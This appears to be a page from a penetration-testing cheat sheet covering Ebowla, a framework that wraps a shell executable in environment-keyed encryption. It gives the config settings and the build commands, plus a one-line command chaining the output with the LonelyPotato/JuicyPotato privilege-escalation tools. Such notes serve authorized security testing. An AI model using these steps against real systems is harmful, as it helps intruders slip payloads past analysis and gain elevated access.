> For the complete documentation index, see [llms.txt](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/misc/ebowla.md).

# Ebowla

> Framework for Making Environmental Keyed Payloads (NO LONGER SUPPORTED)\
> [GitHub - Genetic-Malware/Ebowla](https://github.com/Genetic-Malware/Ebowla)

## Usage

```bash
genetic.config
output_type = GO
payload_type = EXE
```

Configure stuff in `[[ENV_VAR]]`, e.g. computer\_name

```bash
python ebowla.py <shell.exe> genetic.config
./build_x64_go.sh output/<generated-go-script> <output.exe>
```

## Use with LonelyPotato / RottenPotato / JuicyPotato

```
lonelypotato.exe * <ebowla-output.exe>
```
